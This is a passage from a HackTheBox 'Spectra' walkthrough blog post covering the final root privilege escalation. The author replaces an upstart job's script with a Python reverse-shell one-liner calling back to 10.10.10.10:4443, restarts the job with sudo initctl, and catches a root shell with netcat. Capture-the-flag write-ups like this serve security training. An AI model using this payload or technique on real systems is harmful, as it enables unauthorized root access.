<p>I have chosen the file <code class="language-plaintext highlighter-rouge">/etc/init/test10.conf</code>, which had the content below, and changed only the script section, as the second block shared below.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>katie@spectra ~ <span class="nv">$ </span><span class="nb">cat</span> /etc/init/test10.conf
description <span class="s2">"Test node.js server"</span>
author      <span class="s2">"katie"</span>

start on filesystem or runlevel <span class="o">[</span>2345]
stop on shutdown

script

    <span class="nb">export </span><span class="nv">HOME</span><span class="o">=</span><span class="s2">"/srv"</span>
    <span class="nb">echo</span> <span class="nv">$$</span> <span class="o">&gt;</span> /var/run/nodetest.pid
    <span class="nb">exec</span> /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js

end script
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Edited portion</span>
script
  python <span class="nt">-c</span> <span class="s1">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>
end script
</code></pre></div></div>

<p>After editing the file, initiated the <code class="language-plaintext highlighter-rouge">netcat</code> listener and stopped and started again the job, getting a reverse shell</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># At Spectra as Kali</span>
katie@spectra /etc/init <span class="nv">$ </span><span class="nb">sudo</span> /sbin/initctl stop test10
initctl: Unknown instance:
katie@spectra /etc/init <span class="nv">$ </span><span class="nb">sudo</span> /sbin/initctl start test10
test10 start/running, process 4947
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># At attacker machine</span>
<span class="nv">$ </span>nc <span class="nt">-lnvp</span> 4443
listening on <span class="o">[</span>any] 4443 ...
connect to <span class="o">[</span>10.10.10.10] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.229] 33606
<span class="c"># id</span>
<span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
<span class="c"># whoami</span>
root
<span class="c"># cat /root/root.txt</span>
&lt;redacted&gt;
</code></pre></div></div>

<p>I hope you guys have enjoyed it!</p>

<p>See you in the next post <img class="emoji" title=":smiley:" alt=":smiley:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f603.png" height="20" width="20"></p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/en-US/tag/#hackthebox" class="page__taxonomy-item p-category" rel="tag">HackTheBox</a><span class="sep">, </span>
    
      <a href="/en-US/tag/#htb-easy" class="page__taxonomy-item p-category" rel="tag">HTB Easy</a><span class="sep">, </span>
    
      <a href="/en-US/tag/#htb-linux" class="page__taxonomy-item p-category" rel="tag">HTB Linux</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      <a href="/en-US/categories/#walkthrough" class="page__taxonomy-item p-category" rel="tag">Walkthrough</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time class="dt-published" datetime="2021-06-26T13:00:00-03:00">June 26, 2021</time></p>

      </footer>

      <section class="page__share" id="sharelinks">
  
    <h4 class="page__share-title">Share on</h4>
  

  <!-- CUSTOM: Localized sharing links -->
  

  <a href="https://twitter.com/intent/tweet?via=zerahzurc&amp;text=Walktrough%3A+HTB+Spectra%20https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F06%2Fhtb-spectra" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F06%2Fhtb-spectra" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F06%2Fhtb-spectra" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>

  <a href="whatsapp://send?text=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F06%2Fhtb-spectra" data-action="share/whatsapp/share" class="btn btn--whatsapp" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Whatsapp"><i class="fab fa-fw fa-whatsapp" aria-hidden="true"></i><span> Whatsapp</span></a>

  <a href="https://telegram.me/share/url?url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F06%2Fhtb-spectra&amp;text=Walktrough%3A+HTB+Spectra" class="btn btn--telegram" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Telegram"><i class="fab fa-fw fa-telegram-plane" aria-hidden="true"></i><span> Telegram</span></a>

  <!-- END CUSTOM: Localized sharing links -->
</section>


      
  <nav class="pagination">
    
    
      <a href="/en-US/walkthrough/2021/06/htb-tenet" class="pagination--pager" title="Walktrough: HTB Tenet
">Previous</a>
    
    
    
      
        <a href="/en-US/walkthrough/2021/07/htb-ophiuchi" class="pagination--pager" title="Walktrough: HTB Ophiuchi
">Next</a>
      
    
  </nav>

    </div>

    
      <div class="page__comments">
  
  
      <h4 class="page__comments-title">Leave a comment</h4>
      <section id="utterances-comments"></section>
    
</div>

    
  </article>

  
  
    <div class="page__related">
      <h2 class="page__related-title">You may also enjoy</h2>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/TJKS5F6.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/10/htb-explore" rel="permalink">Walktrough: HTB Explore
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-30T13:00:00-03:00">October 30, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/06/htb-spectra">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Explore, an easy-rated Android box from Hack The Box, created by bertolis.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/89b1SdH.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/10/htb-dynstr" rel="permalink">Walktrough: HTB Dynstr
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-16T13:00:00-03:00">October 16, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          9 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/06/htb-spectra">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Dynstr, another medium-rated Linux box from Hack The Box, created by jkr.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/JkBtXmO.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/10/htb-cap" rel="permalink">Walktrough: HTB Cap
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-02T13:00:00-03:00">October 2, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          6 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/06/htb-spectra">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Cap, another easy-rated Linux box from Hack The Box, created by InfoSecJack.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/pUqq7fY.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/09/htb-pit" rel="permalink">Walktrough: HTB Pit
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-09-25T09:00:00-03:00">September 25, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          11 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/06/htb-spectra">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Pit, another medium-rated Linux box from Hack The Box, created by polarbearer and GibParadox.
</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap">
<form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term...">
  </form>
  <div id="results" class="results"></div>
</div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- Mermaid.js -->
<script type="module">
    import mermaid from 'https://unpkg.com/mermaid@9/dist/mermaid.esm.min.mjs';
    const config = {
        "theme": "dark", 
        "startOnLoad": true
    };
    mermaid.initialize(config);
</script>

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    
      <li><strong>Follow:</strong></li>
    

    
      
        
          <li><a href="https://www.linkedin.com/in/davicruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i> Linkedin</a></li>
        
      
        
          <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i> Twitter</a></li>
        
      
        
          <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub</a></li>
        
      
    
    <!-- start custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
    
      <li><a href="/en-US/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
    <li><a href="https://davicruz.com/en-US/terms-and-privacy/" rel="nofollow noopener noreferrer"><i class="fas fa-user-shield" aria-hidden="true"></i> Terms of Service and Privacy Policy</a></li>
    <!--<li><a onclick="return klaro.show();"><i class="fas fa-shield-alt" aria-hidden="true"></i> Review consent</a></li>-->
    
      
        
          <li><a href="/">Disponível também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></li>
        
        
        
      
    
      
    
    <!-- end custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
  </ul>
</div>

<div class="page__footer-copyright">© 2023 Davi Cruz. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a> &amp; <a href="https://github.com/kurtsson/jekyll-multiple-languages-plugin" rel="nofollow">Multiple Languages Plugin</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




  <!-- start custom analytics snippet -->

<!-- end custom analytics snippet -->





    <script>
  'use strict';

  (function() {
    var commentContainer = document.querySelector('#utterances-comments');

    if (!commentContainer) {
      return;
    }

    var script = document.createElement('script');
    script.setAttribute('src', 'https://utteranc.es/client.js');
    script.setAttribute('repo', 'davi-cruz/davi-cruz-blog');
    // CUSTOM : Utterances post mapping due to Jekyll Multilanguage
    script.setAttribute('issue-term', 'htb-spectra');
    
    script.setAttribute('theme', 'github-dark');
    script.setAttribute('crossorigin', 'anonymous');

    commentContainer.appendChild(script);
  })();
</script>

  





  </body>
</html>
